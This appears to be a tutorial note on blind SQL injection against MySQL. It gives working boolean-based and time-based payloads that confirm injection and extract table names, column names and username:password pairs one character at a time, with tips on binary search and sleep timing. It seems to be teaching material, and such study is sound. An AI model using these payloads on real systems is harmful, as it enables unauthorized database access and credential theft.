Boolean-based blind injection
Step 1: testing
payload: ' and 1=1# (page unchanged) | ' and 1=2# (page changes)
If the page renders normally with 1=1 and differently with 1=2, the input reaches the SQL query inside a single-quoted string and a SQL injection vulnerability exists. Both payloads are appended to a value that normally matches (e.g. id=1' and 1=1#); otherwise the condition is ANDed with an already false comparison and the two responses look the same. When sending through a URL, encode # as %23, or the browser treats it as the fragment and it never reaches the server.
Step 2: blind extraction
Dump table names: payload: ' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>0#
Dump column names: payload: ' and ascii(substr((select column_name from information_schema.columns where table_name='xxxx' limit 0,1),1,1))>0#
Dump data: payload: ' and ascii(substr((select concat(username,0x3a,password) from xxxx limit 0,1),1,1))>0#
Two corrections to the commonly copied versions of these payloads: the table-name subquery needs limit 0,1, because a subquery used as a scalar must return exactly one row and MySQL errors out ("Subquery returns more than 1 row") as soon as the schema has several tables; and the data subquery must return a single column, so username and password are joined with concat() (0x3a is ':' written in hex to avoid another quote). The >0 comparison only confirms that a character exists at that offset. To recover it, compare against further values (>64, >96, ...; a binary search takes about seven requests per character, against up to 127 with sequential guessing), then increase the substr offset (1,1 -> 2,1 -> 3,1) for the next character, and increase the limit offset (0,1 -> 1,1) for the next table, column or row. Guess one character at a time this way.
Time-based blind injection
Step 1: same as above
Step 2: blind extraction
Dump table names: payload: ' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>0,sleep(5),1)#
Dump column names: payload: ' and if(ascii(substr((select column_name from information_schema.columns where table_name='xxxx' limit 0,1),1,1))>0,sleep(5),1)#
Dump data: payload: ' and if(ascii(substr((select concat(username,0x3a,password) from xxxx limit 0,1),1,1))>0,sleep(5),1)#
Guess one character at a time based on whether the response is delayed. This is the fallback when the page looks identical for true and false conditions: the condition is the same as in the boolean case, but a true result is signalled by a response that takes at least 5 seconds. Choose a delay well above the normal response-time variation, and keep in mind that sleep() is evaluated for every row the rest of the WHERE clause accepts, so a query that matches many rows can stall far longer than 5 seconds per true guess.
Blind injection practice (homework)